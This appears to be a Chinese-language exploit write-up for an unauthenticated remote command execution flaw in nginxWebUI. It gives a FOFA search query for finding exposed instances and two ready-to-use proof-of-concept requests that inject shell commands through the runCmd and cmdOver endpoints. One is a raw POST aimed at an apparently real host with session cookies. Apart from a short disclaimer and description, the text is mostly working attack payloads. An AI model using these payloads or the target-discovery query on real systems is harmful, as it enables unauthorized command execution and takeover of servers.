免责声明

技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！！

漏洞描述

nginxWebUI后台提供执行nginx相关命令的接口，由于未对用户的输入进行过滤，导致可在后台执行任意命令。并且该系统权限校验存在问题，导致存在权限绕过，在前台可直接调用后台接口，最终可以达到无条件远程命令执行的效果。

资产确定

fofa：body="nginxWebUI"

漏洞复现

1.前台使用GET方式利用如下POC执行id命令

/AdminPage/conf/runCmd?cmd=id%26%26echo%20nginx

2.后端使用POST请求利用如下POC执行id命令 我没复现

POST /adminPage/remote/cmdOver HTTP/1
Host: nginx-ui.chat1.ai
Content-Length: 38
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://nginx-ui.chat1.ai
Referer: http://nginx-ui.chat1.ai/adminPage/remote
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SOLONID=3395e696670044ea9d0e3fe31dcdf09e; Hm_lvt_8acef669ea66f479854ecd328d1f348f=1688543107; Hm_lpvt_8acef669ea66f479854ecd328d1f348f=1688544139

remoteId=local&cmd=start|id&interval=1